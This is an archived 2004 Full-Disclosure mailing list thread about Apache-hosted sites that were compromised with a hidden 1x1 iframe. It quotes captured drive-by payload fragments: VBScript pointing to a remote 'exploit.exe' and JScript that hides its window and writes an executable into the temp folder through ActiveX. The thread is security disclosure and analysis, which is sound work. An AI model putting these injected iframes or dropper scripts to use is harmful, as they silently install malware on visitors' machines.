Re: [Full-Disclosure] browser hijack by apache sites

From: D B (geggam692000_at_yahoo.com)
Date: 05/23/04

  • Next message: Tobias Weisserth: "Re: [Full-Disclosure] Gentoo-announce flood" 
    To: filbert@pandora.be
Date: Sun, 23 May 2004 10:16:55 -0700 (PDT)

     using konqueror i got it to download these two files

    Filename 1: 2DimensionOfExploitsEnc.php

    <html>

    <script language=vbs>
    szURL = "http://www.pizdato.biz/acc1/exploit.exe"
    </script>

    <script language="VBScript.Encode">

    Filename 2: object2.cfm

    <script language=jscript>
    self.moveTo(5000,5000);
    self.close();
    fs=new ActiveXObject("Scripting.FileSystemObject");
    fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
    a=fs.CreateTextFile(fname,true);
    a.Write('MZ');
    a.Close();
    a=fs.OpenTextFile(fname,8,false,true);

    >Message: 1
    >From: Filbert <filbert@pandora.be>
    >Reply-To: filbert@pandora.be
    >To: full-disclosure@lists.netsys.com
    >Date: Sun, 23 May 2004 15:19:30 +0200
    >Organization: Hell
    >Subject: [Full-Disclosure] browser hijack by apache
    >sites

    >Hi,

    >This is the second time this weekend that I've been
    >warned of an apache
    >site
    >on a Linux server were a line of code was added to
    >redirect browsers to
    >porn
    >sites.
    >First was the site of a Belgian political party.
    >Second came today, and
    >as of
    >writing this it's still there. The admin was informed
    >so it can be gone
    >soon.

    >hxxp://www.previsit.com/carrefour/nl/ <- hxxp must
    >changed to http
    >IE users do NOT click.

    >the code added at the bottom is:

    ><iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1

    >HEIGHT=1></iframe></body>

    >anyone seen this before? What vulnerability is
    >exploited here? FP?

    >Thx,
    >Filb.

            
                    
    __________________________________
    Do you Yahoo!?
    Yahoo! Domains – Claim yours for only $14.70/year
    http://smallbusiness.promotions.yahoo.com/offer

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Tobias Weisserth: "Re: [Full-Disclosure] Gentoo-announce flood"

    Relevant Pages

    • Re: Fwd: Re: Daemon configuration for Apache
      ... >> Now my problem is one apache startup The ... >> or Sxxhttp has used some configuration file based ... > on some shell script ... Do you Yahoo!? ...
      (perl.beginners)
    • SUMMARY: mass process
      ... Some mentioned expect script, use component Tcl etc, which I wish I had ... > Thanks and I will summarize. ... > Do you Yahoo!? ... Shopping - with improved product search ...
      (SunManagers)
    • Problem with Perl TK
      ... I have a script Perl, ... which enables me to carry out research with Yahoo. ... The error message that I have in return: ... Tk callback for .button1 ...
      (comp.lang.perl.tk)
    • Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger
      ... Messenger 8.1.0.209, and it does not ... Cross-site Scripting with Local Privilege Vulnerability in Yahoo ... Attacker can inject a malicious script with local ...
      (Bugtraq)
    • Cross-site Scripting Vulnerability in phpBB 2.0.3
      ... <SCRIPT> ... Información de Estados Unidos y América Latina, en Yahoo! ... Visítanos en http://noticias.espanol.yahoo.com ...
      (Bugtraq)